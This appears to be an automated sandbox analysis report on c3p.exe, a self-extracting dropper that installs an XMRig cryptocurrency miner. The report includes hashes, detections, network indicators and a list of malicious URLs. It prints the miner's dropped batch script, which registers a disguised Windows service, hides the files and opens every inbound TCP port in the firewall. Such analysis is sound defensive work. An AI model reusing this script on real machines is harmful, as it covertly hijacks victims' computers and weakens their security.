C:\Windows\debug\c3p\WinRing0x64.sys	5%	ReversingLabs
C:\Windows\debug\c3p\svchost.exe	8%	ReversingLabs
C:\Windows\debug\c3p\systems.exe	87%	ReversingLabs	Win64.Coinminer.BitCoinMiner

Source	Detection	Scanner	Label
https://xmrig.com/benchmark/%s	0%	Avira URL Cloud	safe
https://xmrig.com/docs/algorithms	0%	Avira URL Cloud	safe
https://xmrig.com/wizard	0%	Avira URL Cloud	safe
https://xmrig.com/wizard%s	0%	Avira URL Cloud	safe
http://nssm.cc/h	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
auto.c3pool.org	88.198.117.174	true	false		unknown
time.windows.com	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://xmrig.com/benchmark/%s	c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.dr	false	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard	systems.exe, systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://nssm.cc/h	svchost.exe, 00000005.00000000.1347222716.0000000000426000.00000002.00000001.01000000.00000007.sdmp, svchost.exe, 00000009.00000000.1351325044.0000000000426000.00000002.00000001.01000000.00000007.sdmp, svchost.exe.2.dr	false	Avira URL Cloud: safe	unknown
https://xmrig.com/wizard%s	systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.dr	false	Avira URL Cloud: safe	unknown
https://xmrig.com/docs/algorithms	c3p.exe, 00000002.00000003.1341556755.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, systems.exe, systems.exe, 0000000F.00000002.2582766693.00007FF707193000.00000002.00000001.01000000.00000008.sdmp, systems.exe.2.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
88.198.117.174	auto.c3pool.org	Germany	24940	HETZNER-ASDE	false
195.201.97.156	unknown	Germany	24940	HETZNER-ASDE	false
159.69.83.232	unknown	Germany	24940	HETZNER-ASDE	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1456175
Start date and time:	2024-06-12 20:12:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	c3p.exe
Detection:	MAL
Classification:	mal100.evad.mine.winEXE@27/7@5/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 20.101.57.9
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target systems.exe, PID 7504 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: c3p.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
auto.c3pool.org	SecuriteInfo.com.FileRepMalware.25283.7828.exe	Get hash	malicious	BlackMoon	Browse	5.161.70.189
	pg_ctlk.exe	Get hash	malicious	Xmrig	Browse	188.34.196.123
	logor.elf	Get hash	malicious	Xmrig	Browse	5.161.70.189
	qk6CviFPOs.exe	Get hash	malicious	Xmrig	Browse	5.161.70.189
	http://198.255.70.77:19490/spread.txt	Get hash	malicious	ETERNALBLUE	Browse	5.161.50.27

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	https://storage.googleapis.com/vtuca3aw8cqe54/qsvg3pmsrpytzq.html#uRNV.aspx?fRl9xNccv7stcyMkCcddc4ddcJffcncsXcbbb4X	Get hash	malicious	Phisher	Browse	88.198.55.100
	Orders34754733________________________pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	188.40.116.241
	http://www.acierta24.es/	Get hash	malicious	GRQ Scam	Browse	136.243.216.235
	https://tinyurl.com/dafdadd/?email=bok@wodociagi.katowice.pl	Get hash	malicious	Unknown	Browse	5.161.38.67
	file.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	148.251.154.222
	https://app.tnotice.com/ui/getEmail.ashx?k64=V1Zaa1VrOVZNVFpXVkVwUVZqQndjMVJyVWtaa1JUVkZZVWR3V21WVVFYZFVNRkp2WVVWNFZXRkhkRnBsYkZZd1YxZHdRMkZzY0VWaE0yUmhVakJWZVZkclpFcE5hM0IwVm01U1VWWXdXakZaYlRGR1pGWndTRkp1Vm1GVFJYQnpWMVpXUTJGdFNYcFRha0poVmpBMU1sbHROVk5qUlhoMFlrUkJiVlZyTUROT2JWSnRaVmhrYkdOcVVURlBWRmsxVkRGQ1dGSldTa1JYUVQwOQ==	Get hash	malicious	Unknown	Browse	176.9.109.10
	SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRAT	Browse	116.203.14.211
	file.exe	Get hash	malicious	Vidar	Browse	116.203.14.211
	https://re-captha-version-3-277.buzz/ms/0406_desc_B/?c=e52190ad-32b4-4b8b-9020-6cee7a12dc83&a=l201267	Get hash	malicious	GRQ Scam	Browse	136.243.216.232
	TjFONu89sH.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
HETZNER-ASDE	https://storage.googleapis.com/vtuca3aw8cqe54/qsvg3pmsrpytzq.html#uRNV.aspx?fRl9xNccv7stcyMkCcddc4ddcJffcncsXcbbb4X	Get hash	malicious	Phisher	Browse	88.198.55.100
	Orders34754733________________________pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	188.40.116.241
	http://www.acierta24.es/	Get hash	malicious	GRQ Scam	Browse	136.243.216.235
	https://tinyurl.com/dafdadd/?email=bok@wodociagi.katowice.pl	Get hash	malicious	Unknown	Browse	5.161.38.67
	file.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	148.251.154.222
	https://app.tnotice.com/ui/getEmail.ashx?k64=V1Zaa1VrOVZNVFpXVkVwUVZqQndjMVJyVWtaa1JUVkZZVWR3V21WVVFYZFVNRkp2WVVWNFZXRkhkRnBsYkZZd1YxZHdRMkZzY0VWaE0yUmhVakJWZVZkclpFcE5hM0IwVm01U1VWWXdXakZaYlRGR1pGWndTRkp1Vm1GVFJYQnpWMVpXUTJGdFNYcFRha0poVmpBMU1sbHROVk5qUlhoMFlrUkJiVlZyTUROT2JWSnRaVmhrYkdOcVVURlBWRmsxVkRGQ1dGSldTa1JYUVQwOQ==	Get hash	malicious	Unknown	Browse	176.9.109.10
	SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRAT	Browse	116.203.14.211
	file.exe	Get hash	malicious	Vidar	Browse	116.203.14.211
	https://re-captha-version-3-277.buzz/ms/0406_desc_B/?c=e52190ad-32b4-4b8b-9020-6cee7a12dc83&a=l201267	Get hash	malicious	GRQ Scam	Browse	136.243.216.232
	TjFONu89sH.exe	Get hash	malicious	Quasar	Browse	195.201.57.90
HETZNER-ASDE	https://storage.googleapis.com/vtuca3aw8cqe54/qsvg3pmsrpytzq.html#uRNV.aspx?fRl9xNccv7stcyMkCcddc4ddcJffcncsXcbbb4X	Get hash	malicious	Phisher	Browse	88.198.55.100
	Orders34754733________________________pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	188.40.116.241
	http://www.acierta24.es/	Get hash	malicious	GRQ Scam	Browse	136.243.216.235
	https://tinyurl.com/dafdadd/?email=bok@wodociagi.katowice.pl	Get hash	malicious	Unknown	Browse	5.161.38.67
	file.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	148.251.154.222
	https://app.tnotice.com/ui/getEmail.ashx?k64=V1Zaa1VrOVZNVFpXVkVwUVZqQndjMVJyVWtaa1JUVkZZVWR3V21WVVFYZFVNRkp2WVVWNFZXRkhkRnBsYkZZd1YxZHdRMkZzY0VWaE0yUmhVakJWZVZkclpFcE5hM0IwVm01U1VWWXdXakZaYlRGR1pGWndTRkp1Vm1GVFJYQnpWMVpXUTJGdFNYcFRha0poVmpBMU1sbHROVk5qUlhoMFlrUkJiVlZyTUROT2JWSnRaVmhrYkdOcVVURlBWRmsxVkRGQ1dGSldTa1JYUVQwOQ==	Get hash	malicious	Unknown	Browse	176.9.109.10
	SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exe	Get hash	malicious	PureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRAT	Browse	116.203.14.211
	file.exe	Get hash	malicious	Vidar	Browse	116.203.14.211
	https://re-captha-version-3-277.buzz/ms/0406_desc_B/?c=e52190ad-32b4-4b8b-9020-6cee7a12dc83&a=l201267	Get hash	malicious	GRQ Scam	Browse	136.243.216.232
	TjFONu89sH.exe	Get hash	malicious	Quasar	Browse	195.201.57.90

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\debug\c3p\WinRing0x64.sys	wk.exe	Get hash	malicious	Xmrig	Browse
	HaQQVRT0Xg.exe	Get hash	malicious	RedLine, Xmrig	Browse
	1hMmINqZK8.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Trojan.InjectNET.14.20916.16428.exe	Get hash	malicious	Xmrig	Browse
	aFc8xaUnnc.exe	Get hash	malicious	Xmrig	Browse
	RXvFSINxlG.exe	Get hash	malicious	Xmrig	Browse
	TS-240605-Millenium1.exe	Get hash	malicious	Blank Grabber, Discord Token Stealer, Millenuim RAT, Xmrig	Browse
	zTMEFv0Dh3.exe	Get hash	malicious	Xmrig	Browse
	L8PUw3vvb1.exe	Get hash	malicious	Xmrig	Browse
	nByQ55eAWj.exe	Get hash	malicious	Xmrig	Browse
C:\Windows\debug\c3p\svchost.exe	6tJtH22I7a.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	yGn9saDnXX.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc	Browse
	SecuriteInfo.com.Trojan.DownLoader27.28375.18704.16604.exe	Get hash	malicious	Unknown	Browse
	W0GMc7Catw.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Windows\debug\c3p\SHA256SUMS

Download File

Process:	C:\Users\user\Desktop\c3p.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	748
Entropy (8bit):	4.6828996240903065
Encrypted:	false
SSDEEP:	12:luxgnoy/wHIX+XhsYyc+ATPJT5RwR4CRIh7wOtf8CuuS0mzBvadgh9:Kgnoy/qIORG+d5eRdOt1ud0Ydh9
MD5:	617561CC39E6650B0965E41DC341998E
SHA1:	A4E79538093248C1F05676D201A40B87716EF897
SHA-256:	1FB526571985D284BD65B653BD1EF7E08155B8C0E6BD64929A105A269E6B884C
SHA-512:	A71285F309D0F6415E27E324FA647B57391CC782243BA3231B94D183C6D84EA6F8A2A455FE0938818EB7AF342B6716EB98FC98068AA5CAC6E8BEE1957D735B20
Malicious:	false
Preview:	11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 WinRing0x64.sys.235a64e3520b1c2c27763122b303f78aee8d7c083dfd9f1eb936cd5174383609 benchmark_10M.cmd.d7747e7a3c782009f4ceb6e9c106115876386853929563b509da5258e3968d15 benchmark_1M.cmd.2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec config.json.e73491065d86b1ad69229bb5d2019e08b947e11a2a57adf5c2d9a2b5d8f4acad pool_mine_example.cmd.810614290bdb14d2ddf10f65f8adc988a8272764f2a9e2c378e52fad162da344 rtm_ghostrider_example.cmd.33497c69c21fa96bbc96f1d7f09608e462f8ab22555364977c0bd35fef27bc29 solo_mine_example.cmd.8e70ef38fe14a2ee2848df3d6f7e260d1caf8cfc15de694d678b8af151d62333 start.cmd.d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 *xmrig.exe.

C:\Windows\debug\c3p\WinRing0x64.sys

Download File

Process:	C:\Users\user\Desktop\c3p.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: wk.exe, Detection: malicious, Browse Filename: HaQQVRT0Xg.exe, Detection: malicious, Browse Filename: 1hMmINqZK8.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.InjectNET.14.20916.16428.exe, Detection: malicious, Browse Filename: aFc8xaUnnc.exe, Detection: malicious, Browse Filename: RXvFSINxlG.exe, Detection: malicious, Browse Filename: TS-240605-Millenium1.exe, Detection: malicious, Browse Filename: zTMEFv0Dh3.exe, Detection: malicious, Browse Filename: L8PUw3vvb1.exe, Detection: malicious, Browse Filename: nByQ55eAWj.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Windows\debug\c3p\cmd.bat

Download File

Process:	C:\Users\user\Desktop\c3p.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	478
Entropy (8bit):	5.0722345607285035
Encrypted:	false
SSDEEP:	6:oR+AgVHzf+AaTf9HGBCkI770Agzj12IO8C/VnEQKEV8EMEkA807IsxYFMLPxFmGc:oRqTSTsBCBEx2InC/Z2b7NvwyMxdy
MD5:	6585C3073CFC45A3BDD30ED7521E84A0
SHA1:	5196ABC0728F1A14E554FAF155FC3B31C1F57257
SHA-256:	DA2FAA5EB4171DD5272402DAB13E882445A9E8F114DEFEA3CAABD2AD841E24F4
SHA-512:	FA11518E7E258D2A980D07F3E9C03EB1BF9B6A7413F62E2DA3977046AD5FCB2BB05BD55ED83512A3027D9D07B5A884F0BCCD16742F9C9FD6891ACE98F80DD849
Malicious:	true
Preview:	C:\WINDOWS\Debug\c3p\svchost.exe install "Networks2" C:\WINDOWS\Debug\c3p\systems.exe..sc config "Networks2" DisplayName= "Networksrs2"..sc description "Networks2" "Microsoft Windows Networks"..Set ProcessName=systems.exe..sc start "Networks2"..attrib C:\Windows\debug\c3p +h +a..attrib C:\Windows\debug\c3p\.json +h +a +s +r..attrib C:\Windows\debug\c3p\.exe +h +a +s +r..netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow..

C:\Windows\debug\c3p\config.json

Download File

Process:	C:\Users\user\Desktop\c3p.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2294
Entropy (8bit):	4.1953729532377615
Encrypted:	false
SSDEEP:	24:1pMDhY2W5TtTWIJi9CKIHFU0TtNOGeMyMu+4gjqut6D4mY+at3CR1at30bA13GJY:EePpTdyn50hCPF8bt6UtZtEb1lgPHB
MD5:	BA73071A3D8A7FE866D174AA256D1C3E
SHA1:	0A38FD8A8B287D44B4964E862AB241872E036115
SHA-256:	EE17B3A37459ED492847D2DC003F4904DCBF0D1579416474AC8C7B07CA96B81C
SHA-512:	CCC9B11406E893CDC6F2563E0C7E00A488D1685E2D58E6324B2680FAFFA40CB47CF9A8EAB4CD77B1C67A85AA9FFD4811A21F84954F0F7345A0A477082106348D
Malicious:	false
Preview:	{.. "api": {.. "id": null,.. "worker-id": null.. },.. "http": {.. "enabled": false,.. "host": "127.0.0.1",.. "port": 0,.. "access-token": null,.. "restricted": true.. },.. "autosave": true,.. "background": false,.. "colors": true,.. "title": true,.. "randomx": {.. "init": -1,.. "mode": "auto",.. "1gb-pages": false,.. "rdmsr": true,.. "wrmsr": true,.. "cache_qos": false,.. "numa": true.. },.. "cpu": {.. "enabled": true,.. "huge-pages": true,.. "hw-aes": null,.. "priority": null,.. "memory-pool": false,.. "yield": true,.. "max-threads-hint": 40,.. "asm": true,.. "argon2-impl": null,.. "astrobwt-max-size": 550,.. "cn/0": false,.. "cn-lite/0": false,.. "kawpow": false.. },.. "opencl": {.. "enabled": false,.. "cache": true,.. "loader": null,..

C:\Windows\debug\c3p\svchost.exe

Download File

Process:	C:\Users\user\Desktop\c3p.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	5.548858855357459
Encrypted:	false
SSDEEP:	6144:4BULviqYnI3QA7JTXRnZSHL2GZbkG/TZgLgst2rDkXNBD:wqBlG/TZgUsxXNBD
MD5:	D9EC6F3A3B2AC7CD5EEF07BD86E3EFBC
SHA1:	E1908CAAB6F938404AF85A7DF0F80F877A4D9EE6
SHA-256:	472232CA821B5C2EF562AB07F53638BC2CC82EAE84CEA13FBE674D6022B6481C
SHA-512:	1B6B8702DCA3CB90FE64C4E48F2477045900C5E71DD96B84F673478BAB1089FEBFA186BFC55AEBD721CA73DB1669145280EBB4E1862D3B9DC21F712CD76A07C4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Joe Sandbox View:	Filename: 6tJtH22I7a.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: yGn9saDnXX.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.DownLoader27.28375.18704.16604.exe, Detection: malicious, Browse Filename: W0GMc7Catw.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6.Y.W...W...W....1..W....'..W.......W...W..<W.... ..W....0..W....5..W..Rich.W..................PE..L....@.T............................S>............@..................................S......................................d........`..._..............................................................@...............H............................text............................... ..`.rdata...I.......J..................@..@.data....0... ......................@....rsrc...._...`...`... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\debug\c3p\systems.exe

Download File

Process:	C:\Users\user\Desktop\c3p.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	8251392
Entropy (8bit):	6.631497383775146
Encrypted:	false
SSDEEP:	98304:/Ss0YJodntQk3Hv7I4a1Shua+XOoca2q4RVHNaAXMbmx4WH5umbLtb/IRHOhrgjY:LqQk3DBNfrkhKj4DbrxLskS3qAP2
MD5:	E2FE87CC2C7DAB8CA6516620DCCD1381
SHA1:	F714EC0448325435103519452610CF7AADF8BBBA
SHA-256:	D0CF7388253342F43F9B04DA27F3DA9EE18614539EFDC2D9C4A0239AF51DDBE4
SHA-512:	8455C47E8470E0E322426BC9B9F3C7E858D803BFC8C5D576D580F88585F550B95043139D69B0750A3E211915E3F5EC7A67E7784DCF8CAC6BD8FE51AB7E9CBED6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\debug\c3p\systems.exe, Author: Joe Security Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Windows\debug\c3p\systems.exe, Author: unknown Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\debug\c3p\systems.exe, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\debug\c3p\systems.exe, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\debug\c3p\systems.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....Z_e...............&.._...}...2............@.............................0.......K~...`... .................................................F...@...\....v.................d.............................t.(......................@............................text....._......._.................`..`.data...`.... _...... _.............@....rdata.. ....0`......&`.............@..@.pdata........v.......v.............@..@.xdata........y.......x.............@..@.bss......2...\|..........................idata...F......H....\|.............@....CRT....h.... ........\|.............@....tls.........0........\|.............@....rsrc....\...@...\....\|.............@....reloc..d............X}.............@..B........................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.2359263506290326
Encrypted:	false
SSDEEP:	3:t:t
MD5:	F1CA165C0DA831C9A17D08C4DECBD114
SHA1:	D750F8260312A40968458169B496C40DACC751CA
SHA-256:	ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
SHA-512:	052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
Malicious:	false
Preview:	Ok.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, RAR self-extracting archive
Entropy (8bit):	7.98074133598679
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	c3p.exe
File size:	3'127'301 bytes
MD5:	02aa02aee2a6bd93a4a8f4941a0e6310
SHA1:	03287a15bfd67ff8c3340c0bae425ecaa37a929f
SHA256:	01a976b80253450a09d0b89075f5fa923a3411265f7bc8f3413d059fd662aa83
SHA512:	8103b18a8957fb1cb1e0f6f00eb4c81a037151fc2cd89f13f530eb7ea3002d23cdad037fb39610c38c3a71029a6c7b767d7ce00ada4cbd37e9f6ba0ed9af0f0c
SSDEEP:	49152:YKbiWztohDIZZYiOG2qPX4xRgPZcUAtijL+kOqxvDUuPBBVFJt6NGGTDVOXLyago:YKGWJ6sDYI2qPX4fgPZcUAUjSkXvDUin
TLSH:	77E5333174A08033E113443587D4D7366879B9749A322A9EFF548A7D7F21EA2C267BB3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&K.HG%.HG%.HG%.A?..SG%.A?...G%.A?..]G%.HG$..G%.A?../G%.A?..IG%.A?..IG%.A?..IG%.RichHG%.................PE..L...b.}T...........

File Icon


Icon Hash:	2775250905472797

Static PE Info

General

Entrypoint:	0x41d5db
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x547D8F62 [Tue Dec 2 10:07:30 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	4cfda23baf1e2e983ddfeca47a5c755a

Entrypoint Preview

Instruction
call 00007F1AE08BE19Ah
jmp 00007F1AE08B7C8Dh
mov edi, edi
push ebp
mov ebp, esp
push esi
lea eax, dword ptr [ebp+08h]
push eax
mov esi, ecx
call 00007F1AE08B7A97h
mov dword ptr [esi], 0042B220h
mov eax, esi
pop esi
pop ebp
retn 0004h
mov dword ptr [ecx], 0042B220h
jmp 00007F1AE08B7B4Ch
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, ecx
mov dword ptr [esi], 0042B220h
call 00007F1AE08B7B39h
test byte ptr [ebp+08h], 00000001h
je 00007F1AE08B7E19h
push esi
call 00007F1AE08B4863h
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
push esi
push edi
mov edi, dword ptr [ebp+08h]
mov eax, dword ptr [edi+04h]
test eax, eax
je 00007F1AE08B7E59h
lea edx, dword ptr [eax+08h]
cmp byte ptr [edx], 00000000h
je 00007F1AE08B7E51h
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [esi+04h]
cmp eax, ecx
je 00007F1AE08B7E26h
add ecx, 08h
push ecx
push edx
call 00007F1AE08BB2C3h
pop ecx
pop ecx
test eax, eax
je 00007F1AE08B7E16h
xor eax, eax
jmp 00007F1AE08B7E36h
test byte ptr [esi], 00000002h
je 00007F1AE08B7E17h
test byte ptr [edi], 00000008h
je 00007F1AE08B7E04h
mov eax, dword ptr [ebp+10h]
mov eax, dword ptr [eax]
test al, 01h
je 00007F1AE08B7E17h
test byte ptr [edi], 00000001h
je 00007F1AE08B7DF6h
test al, 02h
je 00007F1AE08B7E17h
test byte ptr [edi], 00000002h
je 00007F1AE08B7DEDh
xor eax, eax
inc eax
pop edi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax]
cmp eax, 00004F4Dh

Rich Headers

Programming Language:

[ASM] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2008 SP1 build 30729
[EXP] VS2008 SP1 build 30729
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2efa0	0x33	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2db7c	0xdc	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x51000	0x39a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2a3f0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2cc10	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2a000	0x384	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2859a	0x28600	d8f33064c4ef0afbbef55bd2cf99d4bd	False	0.5988958494582043	data	6.722654883969783	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2a000	0x4fd3	0x5000	097554bc8b9e06ca48884fe0bcde4562	False	0.3978515625	data	5.386322012281953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2f000	0x21428	0x1600	1197a4db46cf8f74c620261213b213c9	False	0.33824573863636365	data	3.4665353553434435	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x51000	0x44d8	0x4600	6aa2cae10e88f53028dea6fff76be49b	False	0.33297991071428573	data	4.67739973738274	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_BITMAP	0x5154c	0xbb6	Device independent bitmap graphic, 93 x 302 x 4, 2 compression, image size 2894, resolution 2835 x 2835 px/m	Chinese	China	0.2581721147431621
RT_ICON	0x52104	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	Chinese	China	0.6047297297297297
